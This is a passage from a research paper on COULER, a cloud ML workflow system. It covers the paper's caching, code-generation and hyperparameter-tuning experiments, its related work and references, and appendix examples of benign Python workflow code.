as text classification or sentiment\nanalysis.\nWe evaluate the execution time and caching storage con-\nsumption across five different caching strategies as follows:\n(1)No, indicating no caching; (2) ALL , involving the caching\nof all data and intermediate results; (3) C OULER , representing\nCOULER ’s automatic caching policy. (4) FIFO , first in first\nout; (5) LRU , least recently used. Based on empirical experi-\nence, we choose α= 1.5andβ= 1 in these experiments for\nequation 6.\nFigure 7 illustrates the variations in CPU and GPU usage\nover time, comparing C OULER ’s caching strategy with other\ncaching strategies. Due to space constraints, detailed experi-\nmental results for FIFO and LRU can be found in Appendix\nD.A. It is evident that employing C OULER ’s caching strategy\nenhances GPU and CPU utilization, allowing the entire processto complete in less time. This is because that automatio cache\nmechanism can reduce the frequency of I/O operations. And\naccording to existing work [10], [36], this reduction in I/O\noverhead is significant as it can substantially decrease the\ntime wasted on these operations, leading to a more efficient\nworkflow execution. The scatter plot represents the overall exe-\ncution time and resource consumption of workflows of varying\nsizes, indicating that C OULER ’s caching strategy achieves\nhigher execution efficiency with a smaller additional resource\ncost. C OULER ’s strategy tends to conserve resources by\navoiding unnecessary caching, yet still reaps the performance\nbenefits of caching the most impactful intermediate results.\nWe also calculate the cache hit ratio of the C OULER caching\nstrategy, which, under reasonably set parameters, averages\n84.21% in production environments, significantly improving\nthe efficiency of workflow execution.\n2) Performance study with Data caching: In this section,\nwe investigate the impact of caching on data reading perfor-\nmance by first examining the effect of table caching using two\ntables from an ads recommendation application, highlighting\nhow caching enhances data loading and deep learning model\ntraining efficiency on a hybrid cluster. Secondly, we assess\nthe caching performance for reading small and big files stored\nremotely, demonstrating significant improvements in data read-\ning speed through local caching. Due to space constraints, we\nput detailed discussions into the Appendix D.C.\n3) Performance Study with Cache Sizes: We further de-\nsigned experiments to analyze the impact of different cache\nsizes on C OULER ’s performance. In the same three scenarios:\nMultimodal Training, Image Segmentation, and Language\nModel Fine-tuning, we set the available cache sizes to 10G,\n20G, and a more ample 30G, respectively, and recorded the\nresource utilization and execution time of the workflows under\nthese conditions. Detailed experimental results can be found in\nAppendix D.B.Analysis shows that, under limited cache size\nconditions, C OULER can still effectively improve the efficiency\nof workflow execution, but its effectiveness increases with the\nsize of the cache.\nD. NL to Unified Programming Code Generation: RQ3\n1) Experiment Result: We evaluate the effectiveness of\nutilizing LLMs to facilitate NL to Unified Programming Code\nGeneration and compare our method with GPT-3.5 and GPT-4,\nas shown in Table II. All models are evaluated at temperatures\nt∈ {0.2,0.6,0.8}, and we compute pass@k where k∈\n{1,3,5}for each model. The temperature yielding the best-\nperforming pass@k for each kis selected according to [30].\nThe ’pass@k’ metric is a widely used evaluation method\nin code generation models. It assesses the model’s capacity\nto produce accurate code within its top ’k’ predictions. A\nhigher ’pass@k’ percentage indicates the model’s reliability in\ngenerating correct code options without the need for additional\ninputs or iterations. Our method significantly improves the\nperformance of GPT-4 for NL to unified programming code\ngeneration and has been widely adopted for C OULER code\ngeneration.TABLE II: Evaluation results of our methods with GPT-\n3.5 and GPT-4. Each pass@k (where k∈ {1,3,5}) for\neach model is computed with three sampling temperatures\n(t∈ {0.2,0.6,0.8}) and the highest one among the three are\ndisplayed, which follows the evaluation procedure in [30].\nModelpass@ k[%]\nk= 1 k= 3 k= 5\nGPT-3.5 35.21 37.19 39.21\nGPT-4 45.81 48.11 50.23\nGPT-3.5 + Ours 61.25 62.97 65.03\nGPT-4 + Ours 73.12 75.61 77.38\n2) Running Example: We provided an example that illus-\ntrates the entire process of converting natural language into\nCOULER code. It demonstrates the generation of syntactically\ncorrect code by the LLM. This example aims to select the best\nimage classification model among ResNet, ViT, and DenseNet\nby showing the transformation from natural language descrip-\ntions to code generation. The details are presented in Appendix\nC.\n3) Cost Analysis and Future Prospects Discussion: On the\nmatter of cost, we understand the concerns about the economic\nfeasibility of deploying LLMs, especially considering the cost\nper token for each workflow. So we present the average costs\nfor each workflow in terms of the number of tokens processed\nby LLMs and the corresponding money for model “GPT-\n3.5-turbo” and “GPT-4” in Table III. C OULER has shown\npromising results for a range of tasks except for some complex\nworkflows. The use of LLMs in our research is primarily\naimed at exploring the potential of these models to streamline\nand enhance the code generation process.\nTABLE III: Cost Analysis of Workflow Generation\nCost / WorkflowWorkflow Generation\nGPT-3.5-turbo GPT-4\nToken 3212.1 3813.7\nMoney ($) 0.005 0.140\nWe acknowledge that current LLMs already demonstrate\na satisfactory level of accuracy in code generation. Indeed,\nwe are considering fine-tuning as a viable method to enhance\nthe quality of the generated code. Specifically, our team\nhas conducted work on Multi-LoRA optimization for fine-\ntuning [55]. Additionally, we are developing a workflow for\ncode generation by fine-tuning ‘llama2’. We will soon release\na fine-tuned model in the C OULER open-source repository.\nE. Automatic Hyperparameter Configuration: RQ4\nWe next evaluate the performance of automatic hyperparam-\neters configuration using LLMs to generate recommended hy-\nperparameters. Following the workflow detailed in Workload,\nwe apply automated hyperparameter tuning to both the cvand\nnlpmodules, with HP:Ours as our recommended parameter.\nAs depicted in Figure 8, the recommended parameters exhibit0 20 40 60 80 100\nEpoch01234Loss\nLoss Over Epochs\nHP:Ours\nHP:baseline1\nHP:baseline2\n0 20 40 60 80 100\nEpoch0.20.40.60.8Accuracy\nAccuracy Over Epochs\nHP:Ours\nHP:baseline1\nHP:baseline2(a) Auto Configuration for CV\n0 20 40 60 80 100\nEpoch0.30.40.50.60.7Loss\nLoss Over Epochs\nHP:baseline1\nHP:baseline2\nHP:Ours\n0 20 40 60 80 100\nEpoch0.50.60.70.80.9Accuracy\nAccuracy Over Epochs\nHP:baseline1\nHP:baseline2\nHP:Ours (b) Auto Configuration for NLP\nFig. 8: Effect of Auto Hyperparameter Configuration\nthe lowest loss and the highest accuracy, showcasing the potent\ncapability of C OULER ’s Automatic Hyperparameter Tuning.\nHP-baseline1 represents a set of hyperparameters that were\nmanually selected based on expert knowledge and empirical\nbest practices in the field. HP-baseline2 corresponds to a set\nof hyperparameters derived from historical benchmarks and\nrecommendations in the literature.\nF . Comparative Learning Analysis of Workflow Engines\nTo assess the effectiveness of our system’s unified pro-\ngramming model, we conducted a survey, where we asked 15\nengineers who were not familiar with these workflow engines\nto learn and use code snippets with similar functionality in\nCOULER , Argo, and Airflow. We measured the time it took for\nthem to understand and work with the provided code samples.\nThe results of this survey in Table IV clearly indicate that our\nCOULER API is more user-friendly and easier to learn.\nTABLE IV: Workflow Learning Comparative Analysis\nTime / WorkflowWorkflow Engines\nCOULER Argo Airflow\nTime (min) 18 61 50\nVII. R ELATED WORK\nJobs Scheduling in the Cloud. One machine learning\nworkflow usually includes different stages to produce the\nmodel, and each stage/step is associated with different kinds\nof jobs [7], [23], [35], [39]. Kubernetes [38] boasts a rapidly\ngrowing community and ecosystem, providing robust support\nfor workflows. Kubernetes is based on a highly modular\narchitecture that abstracts the underlying infrastructure and\nallows internal customization. It supports various big-data\nframeworks (e.g. Apache Hadoop MapReduce [17], [41],\nApache Spark [56], Apache Kafka [19], Apache Flink [14]etc). More recently, Kubeflow [23] allows users to submit\ndistributed machine learning tasks on Kubernetes.\nWorkflow for AI/Machine Learning. One machine learn-\ning workflow usually includes different stages to produce the\nmodel, and each stage/step is associated with different kinds\nof jobs [7], [23], [35]. Kubernetes [38] boasts a rapidly grow-\ning community and ecosystem, providing robust support for\nworkflows. TFX [27] is a TensorFlow based AI framework for\nmachine learning model training, but it is specifically designed\nfor TensorFlow only. Some works in the HCI community study\nML/DS workflows by interviewing ML developers and data\nscientists [57].\nWorkflow Engine. A workflow engine is a software ap-\nplication that manages business processes. Argo Workflows\n[5] is an open-source container-native workflow engine for\norchestrating parallel jobs on Kubernetes. Apache Airflow [2]\nis a Python-based platform for running directed acyclic graphs\n(DAGs) of tasks. Apache OOzie [32] is a workflow engine in\nthe Hadoop ecosystem. Kubeflow [23] has a sub-project called\nKubeflow Pipelines for end-users to develop machine learning\npipelines. The complementary list of workflow engines can be\nfound in link [51]. There are also recently workflow engines\nlike Ray [28], CodeFlare [11] and ThunderML [40]. C OULER\nis inspired by the design of PyTorch [34], which compiles a\nhigh-level AI model to a DAG.\nAutomated Machine Learning. Automated Machine\nLearning (AutoML) [18], [48] simplifies the process of ma-\nchine learning model selection and hyper-parameter tuning,\nthereby making ML more accessible to non-experts. In the last\ndecade, substantial advancements in AutoML have emerged\nwith the introduction of open-source frameworks such as Auto-\nWEKA [22], [46], AutoSklearn [13], AutoGluon [12], and\nAuto-PyTorch [59], alongside commercialized frameworks.\nWorkflow Optimization and Query Optimization. Work-\nflow optimization applies broadly, covering areas such as\nscientific workflows, business processes, and cloud computing,\nand addresses tasks beyond data processing, including compu-\ntational and data movement activities. It also faces unique chal-\nlenges like deadlines, budget constraints, and fault tolerance,\nwhich are less common in query optimization. Additionally,\nworkflow optimization utilizes specific strategies like dynamic\nscheduling, partitioning, and machine learning for predictive\noptimization, highlighting its distinct requirements compared\nto the more static nature of query optimization.\nVIII. C ONCLUSION\nIn this paper, we introduced C OULER , a system de-\nsigned for unified machine learning workflow optimization\nin the cloud. C OULER simplifies ML workflow generation\nusing NL descriptions, abstracting the complexities associated\nwith different workflow engines. Furthermore, C OULER boosts\ncomputational efficiency through automated caching, large\nworkflow auto-parallelization, and hyperparameter tuning.\nIX. A CKNOWLEDGEMENT\nWe want to thank Wei Yan who led the initial discussions of\nthe design and implementation of this project. We would liketo thank many colleagues at Alibaba Group and Ant Group\nfor their valuable advice that improved this project, namely,\nLan Li, Jian Liu, Wei Shu, Changhua He, Yi Wang, Jun Jiang,\nChunbo Dai, Chenyi Ding, Mu Xiong, Yitao Shen, Yi Zhang,\nXiaohua Cai, and Qinglong Wang. In addition, we appreciate\nthe timely review and feedback from the Argo team every\ntime when we contributed bug fixes and new features to not\nonly meet our internal requirements but benefit the community\nusers. Last but not least, we are grateful for the contributions\nfrom the C OULER open source community and their initial\npublic adoption and feedback that improves the project.\nREFERENCES\n[1] “Adopters of couler,” https://github.com/couler-proj/couler/blob/master/\nADOPTERS.md, Feb. 2024.\n[2] “Airflow: a workflow management platform,” https://airflow.apache.org/,\nOct. 2023.\n[3] “Alipay: Optimizing alluxio for efficient large-scale\ntraining on billions of files,” https://www.alluxio.io/blog/\noptimizing-alluxio-for-efficient-large-scale-training-on-billions-of-files/,\nFeb. 2024.\n[4] “Machine learning model training with alluxio: Part\n1 solution overview,” https://www.alluxio.io/blog/\nmachine-learning-training-with-alluxio-solution-overview/, Feb.\n2024.\n[5] “Argo workflows,” https://argoproj.github.io/argo-workflows/, Oct. 2023.\n[6] “Authoring and submitting argo work-\nflows using python,” https://blog.argoproj.io/\nauthoring-and-submitting-argo-workflows-using-python-aff9a070d95f,\nFeb. 2024.\n[7] A. Chen, A. Chow, A. Davidson, A. DCunha, A. Ghodsi, S. A. Hong,\nA. Konwinski, C. Mewald, S. Murching, T. Nykodym, P. Ogilvie,\nM. Parkhe, A. Singh, F. Xie, M. Zaharia, R. Zang, J. Zheng, and\nC. Zumar, “Developments in mlflow: A system to accelerate the machine\nlearning lifecycle,” in mlflow , ser. DEEM’20. New York, NY , USA:\nAssociation for Computing Machinery, 2020.\n[8] H.-T. Cheng, Z. Haque, L. Hong, M. Ispir, C. Mewald, I. Polo-\nsukhin, G. Roumpos, D. Sculley, J. Smith, D. Soergel, Y . Tang et al. ,\n“Tensorflow estimators: Managing simplicity vs. flexibility in high-\nlevel machine learning frameworks,” in Proceedings of the 23rd ACM\nSIGKDD International Conference on Knowledge Discovery and Data\nMining , 2017, pp. 1763–1771.\n[9] H.-T. Cheng, L. Koc, J. Harmsen, T. Shaked, T. Chandra, H. Aradhye,\nG. Anderson, G. Corrado, W. Chai, M. Ispir, R. Anil, Z. Haque, L. Hong,\nV . Jain, X. Liu, and H. Shah, “Wide & deep learning for recommender\nsystems,” 2016.\n[10] S. W. Chien, A. Podobas, I. B. Peng, and S. Markidis, “tf-darshan:\nUnderstanding fine-grained i/o performance in machine learning work-\nloads,” in 2020 IEEE International Conference on Cluster Computing\n(CLUSTER) . IEEE, 2020, pp. 359–370.\n[11] “Codeflare,” https://codeflare.readthedocs.io/en/latest/getting started/\noverview.html, Oct. 2023.\n[12] N. Erickson, J. Mueller, A. Shirkov, H. Zhang, P. Larroy, M. Li, and\nA. Smola, “Autogluon-tabular: Robust and accurate automl for structured\ndata,” arXiv preprint arXiv:2003.06505 , 2020.\n[13] M. Feurer, A. Klein, K. Eggensperger, J. Springenberg, M. Blum, and\nF. Hutter, “Efficient and robust automated machine learning,” Advances\nin neural information processing systems , vol. 28, 2015.\n[14] “Flink,” http://flink.apache.org/, Oct. 2023.\n[15] D. Gao, H. Wang, Y . Li, X. Sun, Y . Qian, B. Ding, and J. Zhou, “Text-\nto-sql empowered by large language models: A benchmark evaluation,”\narXiv preprint arXiv:2308.15363 , 2023.\n[16] T. Gebru, J. Morgenstern, B. Vecchione, J. W. Vaughan, H. Wallach,\nH. D. Iii, and K. Crawford, “Datasheets for datasets,” Communications\nof the ACM , vol. 64, no. 12, pp. 86–92, 2021.\n[17] “Hadoop,” http://hadoop.apache.org/, Oct. 2023.\n[18] F. Hutter, L. Kotthoff, and J. Vanschoren, Automated machine learning:\nmethods, systems, challenges . Springer Nature, 2019.\n[19] “Apache kafka,” https://kafka.apache.org/, Oct. 2023.[20] A. B. Kahn, “Topological sorting of large networks,” Commun. ACM ,\nvol. 5, no. 11, p. 558562, Nov. 1962.\n[21] G. Ke, Q. Meng, T. Finley, T. Wang, W. Chen, W. Ma, Q. Ye, and\nT.-Y . Liu, “Lightgbm: A highly efficient gradient boosting decision\ntree,” in Proceedings of the 31st International Conference on Neural\nInformation Processing Systems , ser. NIPS’17, Red Hook, NY , USA,\n2017, p. 31493157.\n[22] L. Kotthoff, C. Thornton, H. H. Hoos, F. Hutter, and K. Leyton-\nBrown, “Auto-weka: Automatic model selection and hyperparameter\noptimization in weka,” Automated machine learning: methods, systems,\nchallenges , pp. 81–95, 2019.\n[23] “Kubeflow,” https://www.kubeflow.org/, Oct. 2023.\n[24] J. Lao, Y . Wang, Y . Li, J. Wang, Y . Zhang, Z. Cheng, W. Chen, M. Tang,\nand J. Wang, “Gptuner: A manual-reading database tuning system via\ngpt-guided bayesian optimization,” arXiv preprint arXiv:2311.03157 ,\n2023.\n[25] H. Li, Alluxio: A virtual distributed file system . University of California,\nBerkeley, 2018.\n[26] M. Mitchell, S. Wu, A. Zaldivar, P. Barnes, L. Vasserman, B. Hutchin-\nson, E. Spitzer, I. D. Raji, and T. Gebru, “Model cards for model\nreporting,” in Proceedings of the conference on fairness, accountability,\nand transparency , 2019, pp. 220–229.\n[27] A. N. Modi, C. Y . Koo, C. Y . Foo, C. Mewald, D. M. Baylor, E. Breck,\nH.-T. Cheng, J. Wilkiewicz, L. Koc, L. Lew, M. A. Zinkevich, M. Wicke,\nM. Ispir, N. Polyzotis, N. Fiedel, S. E. Haykal, S. Whang, S. Roy,\nS. Ramesh, V . Jain, X. Zhang, and Z. Haque, “Tfx: A tensorflow-based\nproduction-scale machine learning platform,” in KDD 2017 , 2017.\n[28] P. Moritz, R. Nishihara, S. Wang, A. Tumanov, R. Liaw, E. Liang,\nM. Elibol, Z. Yang, W. Paul, M. I. Jordan et al. , “Ray: A distributed\nframework for emerging {AI}applications,” in 13th USENIX Sympo-\nsium on Operating Systems Design and Implementation (OSDI 18) ,\n2018, pp. 561–577.\n[29] “Nas,” https://www.alibabacloud.com/product/nas, Oct. 2023.\n[30] E. Nijkamp, B. Pang, H. Hayashi, L. Tu, H. Wang, Y . Zhou, S. Savarese,\nand C. Xiong, “Codegen: An open large language model for code with\nmulti-turn program synthesis,” arXiv preprint arXiv:2203.13474 , 2022.\n[31] “Odps,” https://www.alibabacloud.com/help/product/27797.htm, Oct.\n2023.\n[32] “Apache ooize,” https://oozie.apache.org/, Oct. 2023.\n[33] “Oss,” https://www.alibabacloud.com/product/oss, Oct. 2023.\n[34] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan,\nT. Killeen, Z. Lin, N. Gimelshein, L. Antiga, A. Desmaison, A. Kopf,\nE. Yang, Z. DeVito, M. Raison, A. Tejani, S. Chilamkurthy, B. Steiner,\nL. Fang, J. Bai, and S. Chintala, “Pytorch: An imperative style, high-\nperformance deep learning library,” in Advances in Neural Information\nProcessing Systems 32 , H. Wallach, H. Larochelle, A. Beygelzimer,\nF. d'Alch ´e-Buc, E. Fox, and R. Garnett, Eds. Curran Associates, Inc.,\n2019, pp. 8024–8035.\n[35] N. Polyzotis, S. Roy, S. E. Whang, and M. Zinkevich, “Data lifecycle\nchallenges in production machine learning: A survey,” SIGMOD Rec. ,\nvol. 47, no. 2, p. 1728, Dec. 2018.\n[36] S. Pumma, M. Si, W.-C. Feng, and P. Balaji, “Scalable deep learning via\ni/o analysis and optimization,” ACM Transactions on Parallel Computing\n(TOPC) , vol. 6, no. 2, pp. 1–34, 2019.\n[37] N. Rajkumar, R. Li, and D. Bahdanau, “Evaluating the text-to-sql\ncapabilities of large language models,” arXiv preprint arXiv:2204.00498 ,\n2022.\n[38] D. K. Rensin, Kubernetes - Scheduling the Future at Cloud Scale . 1005\nGravenstein Highway North Sebastopol, CA 95472: k8s, 2015. [Online].\nAvailable: http://www.oreilly.com/webops-perf/free/kubernetes.csp\n[39] B. Sang, S. Gu, X. Zhan, M. Tang, J. Liu, X. Chen, J. Tan, H. Ge,\nK. Zhang, R. Ruan et al. , “Cougar: A general framework for jobs\noptimization in cloud,” in 2023 IEEE 39th International Conference\non Data Engineering (ICDE) . IEEE, 2023, pp. 3417–3429.\n[40] S. Shrivastava, D. Patel, W. M. Gifford, S. Siegel, and J. Kalagnanam,\n“Thunderml: A toolkit for enabling ai/ml models on cloud for industry\n4.0,” in International Conference on Web Services . Springer, 2019, pp.\n163–180.\n[41] K. Shvachko, H. Kuang, S. Radia, and R. Chansler, “The hadoop\ndistributed file system,” in 2010 IEEE 26th Symposium on Mass Storage\nSystems and Technologies (MSST) , 2010, pp. 1–10.\n[42] E. Sparks, S. Venkataraman, T. Kaftan, M. Franklin, and B. Recht,\n“Keystoneml: Optimizing pipelines for large-scale advanced analytics,”\ninkeystoneml , 04 2017, pp. 535–546.[43] R. Sun, S. O. Arik, H. Nakhost, H. Dai, R. Sinha, P. Yin, and T. Pfister,\n“Sql-palm: Improved large language modeladaptation for text-to-sql,”\narXiv preprint arXiv:2306.00739 , 2023.\n[44] “Tekton,” https://tekton.dev/, Oct. 2023.\n[45] “tf-darshan: Understanding fine-grained i/o performance in machine\nlearning workloads,” https://www.osti.gov/biblio/1830501, Feb. 2024.\n[46] C. Thornton, F. Hutter, H. H. Hoos, and K. Leyton-Brown, “Auto-weka:\nCombined selection and hyperparameter optimization of classification\nalgorithms,” in Proceedings of the 19th ACM SIGKDD international\nconference on Knowledge discovery and data mining , 2013, pp. 847–\n855.\n[47] K. Tian, E. Mitchell, A. Zhou, A. Sharma, R. Rafailov, H. Yao, C. Finn,\nand C. D. Manning, “Just ask for calibration: Strategies for eliciting\ncalibrated confidence scores from language models fine-tuned with\nhuman feedback,” arXiv preprint arXiv:2305.14975 , 2023.\n[48] A. Truong, A. Walters, J. Goodsitt, K. Hines, C. B. Bruss, and R. Farivar,\n“Towards automated machine learning: Evaluation and comparison of\nautoml approaches and tools,” in 2019 IEEE 31st international con-\nference on tools with artificial intelligence (ICTAI) . IEEE, 2019, pp.\n1471–1479.\n[49] Y . Wang, Y . Yang, W. Zhu, Y . Wu, X. Yan, Y . Liu, Y . Wang, L. Xie,\nZ. Gao, W. Zhu, X. Chen, W. Yan, M. Tang, and Y . Tang, “Sqlflow: A\nbridge between sql and machine learning,” 2020.\n[50] J. Wei, X. Wang, D. Schuurmans, M. Bosma, F. Xia, E. Chi, Q. V . Le,\nD. Zhou et al. , “Chain-of-thought prompting elicits reasoning in large\nlanguage models,” Advances in Neural Information Processing Systems ,\nvol. 35, pp. 24 824–24 837, 2022.\n[51] “Awesome workflow engines,” https://github.com/meirwah/\nawesome-workflow-engines, Oct. 2023.\n[52] “Xgboost,” https://github.com/dmlc/xgboost, Oct. 2023.\n[53] D. Xin, H. Miao, A. Parameswaran, and N. Polyzotis, “Production\nmachine learning pipelines: Empirical analysis and optimization op-\nportunities,” in Proceedings of the 2021 International Conference on\nManagement of Data , 2021, pp. 2639–2652.\n[54] F. F. Xu, U. Alon, G. Neubig, and V . J. Hellendoorn, “A systematic\nevaluation of large language models of code,” in Proceedings of the\n6th ACM SIGPLAN International Symposium on Machine Programming ,\n2022, pp. 1–10.\n[55] Z. Ye, D. Li, J. Tian, T. Lan, J. Zuo, L. Duan, H. Lu, Y . Jiang, J. Sha,\nK. Zhang et al. , “Aspen: High-throughput lora fine-tuning of large\nlanguage models with a single gpu,” arXiv preprint arXiv:2312.02515 ,\n2023.\n[56] M. Zaharia, M. Chowdhury, T. Das, A. Dave, J. Ma, M. McCauly,\nM. J. Franklin, S. Shenker, and I. Stoica, “Resilient distributed datasets:\nA fault-tolerant abstraction for in-memory cluster computing,” in 9th\nUSENIX Symposium on Networked Systems Design and Implementation\n(NSDI 12) . San Jose, CA: USENIX Association, Apr. 2012, pp. 15–28.\n[57] A. X. Zhang, M. Muller, and D. Wang, “How do data science workers\ncollaborate? roles, workflows, and tools,” 2020.\n[58] S. Zhang, C. Gong, L. Wu, X. Liu, and M. Zhou, “Automl-gpt:\nAutomatic machine learning with gpt,” arXiv preprint arXiv:2305.02499 ,\n2023.\n[59] L. Zimmer, M. Lindauer, and F. Hutter, “Auto-pytorch: Multi-fidelity\nmetalearning for efficient and robust autodl,” IEEE Transactions on\nPattern Analysis and Machine Intelligence , vol. 43, no. 9, pp. 3079–\n3090, 2021.\nAPPENDIX A\nUNIFIED PROGRAMMING MODEL\nThis section provides an overview of the programming\nmodel to define a workflow. We at first introduce the pro-\ngramming interface, then show some examples for running\na workflow in a machine learning application. The major\ndesign rule of C OULER is aiming to help end-users to write\na workflow without the specific knowledge of the workflow\nengine itself. In this paper, we provide two ways to define\na workflow. One way is building a workflow implicitly (e.g.,\ncode 2 and code 3), the other way is explicitly defining a\nworkflow as code 4. The main difference is whether DAG is\ndescribed in the program. The core functions of C OULER arelisted in Table V, we would illustrate how to use C OULER to\nbuild a workflow based on the following examples. Because\nmost data scientists prefer to use Python, the programming\ninterface of C OULER is based on Python. However, this design\nis not limited to Python and could be extended to Java or\nanother language. At Ant Group, we also provided Java client\nfor end-users.\nName API Description\nRun script couler.run script () Run a script in a Pod\nRun container couler.run container () Start a container\nRun job couler.run job() Start a distributed job\nCondition couler.when () Condition definition\nMap couler.map () Start multiple instances for one job\nConcurrent couler.concurrent () Run multiple jobs at the same time\nRecursive couler.exec while () Run a function until a condition meets\nTABLE V: API Summary of C OULER\n1def producer(step_name):\n2 output_path = \"/opt/hello_world.txt\"\n3 output_place =\n4 couler.create_parameter_artifact(\n5 path=output_path, is_global=True\n6 )\n7 return couler.run_container(\n8 image=\"docker/whalesay:latest\",\n9 args=[\"echo -n hello world >\n10 %s\" % output_place.path],\n11 command=[\"bash\", \"-c\"],\n12 output=output_place,\n13 step_name=step_name,\n14 )\n15\n16def consumer(step_name, input):\n17 couler.run_container(\n18 image=\"docker/whalesay:latest\",\n19 command=[\"cowsay\"],\n20 step_name=step_name,\n21 )\n22\n23output = producer(\"step1\")\n24consumer(\"step2\", output)\nCode 2: Basic workflow and artifact definition in C OULER\nA. Basic workflow example and artifact\nA workflow is made by different steps, then each step is\nisolated from each other in the cloud base on the container.\nA container manages the complete the lifecycle of its host\nsystem, the contained environment helps each step to own the\nspecific computing requirement and resource. However, this\nbrings issues to pass data from one step to the following step\nin a workflow. In this work, we introduce the artifact to help\nusers to store the intermediate results inside a workflow.\nAn artifact is a by-product of workflow development and\ncreated. This might include things like data set, parameter,\nand diagram, etc. For example, a machine learning pipeline\ngenerates statistic results, trained models, or new features.\nFor different kinds of artifacts, users can register different\nphysical storage to place the related artifact based on specificName API Description\nParameter couler.create parameter artifact Create a parameter\nHDFS couler.create hd fs artifact Create a HDFS artifact\nAmazon S3 couler.create s3artifact Create a S3 artifact\nAlibaba OSS couler.create ossartifact Create a OSS artifact\nGoogle GCS couler.create gcsartifact Create a GCS artifact\nGit storage couler.create gitartifact Create a Git artifact\nTABLE VI: Artifact support in C OULER\nrequirements. Thus, we introduce multiple ways to store\nartifacts as Table VI.\nTake the code 2 as a running example, users register\na parameter artifact to pass data among two steps (e.g.,\na producer and consumer). Function producer ()generate\na message and pass the message to function consumer ()\nfrom line 1 to line 15. Each function is built based on\ncouler.run container (), where couler.run container ()is\nused to start a Pod in Kubernetes and run the corresponding\nfunction. As a result, two Pods start and run step by step in\nthe workflow as running a local python code lines 22 to 23.\nThen, the workflow engine propagates the related value among\nsteps without users’ interaction. Note, Pods are the smallest\ndeployable units of computing that you can create and manage\nin Kubernetes.\nB. Control flow\n1def random_code():\n2 import random\n3\n4 res = \"heads\" if random.randint(0, 1)\n5 == 0\n6 else \"tails\"\n7 print(res)\n8\n9def flip_coin():\n10 return couler.run_script(\n11 image=\"python:alpine3.6\",\n12 source=random_code)\n13\n14def heads():\n15 return couler.run_container(\n16 image=\"alpine:3.6\",\n17 command=[\"sh\", \"-c\",\n18 ’echo \"it was headed\"’]\n19 )\n20\n21def tails():\n22 return couler.run_container(\n23 image=\"alpine:3.6\",\n24 command=[\"sh\", \"-c\",\n25 ’echo \"it was tailed\"’]\n26 )\n27\n28result = flip_coin()\n29couler.when(couler.equal(result, \"heads\"),\n30 lambda: heads())\n31couler.when(couler.equal(result, \"tails\"),\n32 lambda: tails())\nCode 3: Workflow control in C OULERControl flow is important for defining a workflow. For a\nmachine learning workflow, if a trained model fails to meet\nthe online serving criteria, the following step (e.g., model\ndeployment step) would not push the model to a server rather\nthan alerting user the model training failures.\nThis example code 3 combines the use of a Python function\nresult (e.g., Function random code()), along with condition-\nals, to take a dynamic path in the workflow. In this example,\ndepending on the result of the first step defined in flip coin\n(line 27) , the following step will either run the heads ()\nstep (line 28) or the tails()step (line 29). We can notice,\nsteps in C OULER can be defined via either Python functions\nor script to running for containers (e.g., line 9). In addition,\nthe conditional logic to decide whether to flip the coin in this\nexample is defined via the combined use of couler.when ()and\ncouler.equal (). As a result, users can control the workflow\nlogic based on the results of steps in the workflow dynamically.\nC. Define a workflow explicitly\n1def job(name):\n2 couler.run_container(\n3 image=\"docker/whalesay:latest\",\n4 command=[\"cowsay\"],\n5 args=[name],\n6 step_name=name,\n7 )\n8\n9# A\n10# / \\\n11# B C\n12# \\ /\n13# D\n14def diamond():\n15 couler.dag(\n16 [\n17 [lambda: job(name=\"A\")],\n18 [lambda: job(name=\"A\"),\n19 lambda: job(name=\"B\")], # A ->\nB\n20 [lambda: job(name=\"A\"),\n21 lambda: job(name=\"C\")], # A ->\nC\n22 [lambda: job(name=\"B\"),\n23 lambda: job(name=\"D\")], # B ->\nD\n24 [lambda: job(name=\"C\"),\n25 lambda: job(name=\"D\")], # C ->\nD\n26 ]\n27 )\n28diamond()\nCode 4: Workflow DAG in C OULER\nIn general, data scientists prefer to build a workflow implic-\nitly as the examples mentioned above. On other hand, data\nengineers want to organize a workflow explicitly. C OULER\nsupport end-users to build the dependency among steps based\non function setdependencies . Function setdependencies\ntake input as a function and let the user to define the\ndependencies steps of others based on the step name. Forexample, the code 4 generates a diamond workflow as line 15.\nIn this way, users need to own a clear big picture for the\nworkflow, and under how the running logic among steps in\ntheir real application. At Ant Group, we analyze the users’\npreference to choose to build a workflow and we found major\nof data scientists choose to define a workflow implicitly, yet,\ndata engineers incline to build a workflow explicitly since\nthey facing more than one hundred steps in a workflow.\nThe definition of DAG workflow via explicit way helps data\nengineer to debug a failed workflow more easily, and build a\ncomplicated workflow with hundred nodes.\nD. Example: running recursive in a workflow\nCOULER provide a straightforward way to help end users\nto define the recursive logic in a workflow. For machine\nlearning workflow, data scientists need to search a machine\nlearning model until the model meets the specific requirement\n(e.g., model precision, convergence ratio, or the number of\niteration steps is bigger than predefined value). Thus, data\nscientist hope to search the best ML model in a workflow\nrecursively. Example 5 demonstrates how to run the recursive\nin a workflow. This flip coin()step is running recursively\nuntil the output is equal a tails (line 14 to 15).\n1def random_code():\n2 import random\n3\n4 result = \"heads\" if random.randint(0, 1)\n5 == 0 else \"tails\"\n6 print(result)\n7\n8\n9def flip_coin():\n10 return couler.run_script(\n11 image=\"alpine3.6\",\n12 source=random_code)\n13\n14# Stop flipping coin until the outputs of\n15 ’flip_coin’ is not ’tails’\n16couler.exec_while(couler.equal(\"tails\"),\n17 lambda: flip_coin())\nCode 5: Recursive in C OULER\nE. Example: select a best ML model\n1def train_tensorflow(batch_size):\n2 import couler.steps.tensorflow as tf\n3\n4 return tf.train(\n5 num_ps=1,\n6 num_workers=1,\n7 command=\"python /train_model.py\",\n8 image=\"wide-deep-model:v1.0\",\n9 input_batch_size=batch_size,\n10 )\n11\n12\n13def run_multiple_jobs(num_jobs):\n14 para = []\n15 i = 0\n16 batch_size = 017 while i < num_jobs:\n18 batch_size += 100\n19 para.append(batch_size)\n20 i = i + 1\n21\n22 return couler.map(lambda x:\n23 train_tensorflow(x), para)\n24\n25def evaluation(model_path):\n26 return couler.run_container(\n27 image=\"model_evalutation:v1\",\n28 command=[\"python model_eval.py\"],\n29 args=[model_path],\n30 step_name=\"eval\",\n31 )\n32\n33model_path = run_multiple_jobs(5)\n34couler.map(lambda x: evaluation(x),\n35 model_path)\nCode 6: Searching a best ML model in C OULER\nThe hyper-parameters of machine learning modes such as\nbatch size or converge ratio decide the performance of the\nmodel. Data scientists need to run multiple jobs in one same\nworkflow to find the best model based on the same input data.\nThe sample program 6 implements a model searching\nprocedure for a deep learning model (e.g., wide and deep\nmodel [9]. This is a common recommendation algorithm that\nrecommends items to users based on users’ profiles and user-\nitem interaction. We start by defining a training job via the\nstep 